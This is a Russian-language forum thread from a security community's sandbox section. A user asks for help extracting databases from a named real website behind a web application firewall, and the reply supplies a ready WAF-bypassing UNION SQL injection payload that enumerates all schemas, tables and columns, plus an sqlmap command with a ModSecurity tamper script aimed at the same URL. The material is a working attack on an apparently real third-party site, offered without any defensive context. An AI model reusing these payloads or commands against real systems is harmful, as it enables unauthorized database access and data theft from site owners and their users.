HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2  
Старый 15.03.2018, 08:37
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от Alaich  
Alaich said:

Помогите , я так понял здесь waf , sqlmap видит уязвимость , но не выводит базы , а ручками не умею (
http://www.mtes.ir/portfolio/portfolio.php?id=66
Подскажите , как быть .
На случай если решить руками:

Код:
Code:
id=66'+and+0+/*!00000union*/select+1,2,3,(select(@n)from(select(@n:=0x20),(select(null)from(information_schema.columns)where(0x2b)in(@n:=concat/**/(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))and(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))n),5,6,7,8,9,0--+-
Или хочешь засрать логи:

Код:
Code:
sqlmap.py --url=http://www.mtes.ir/portfolio/portfolio.php?id=66 --no-cast --banner --dbms=MySQL --tamper=modsecurityversioned --risk 3 --level 3 --technique=U --union-cols=10 --union-char=1337
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ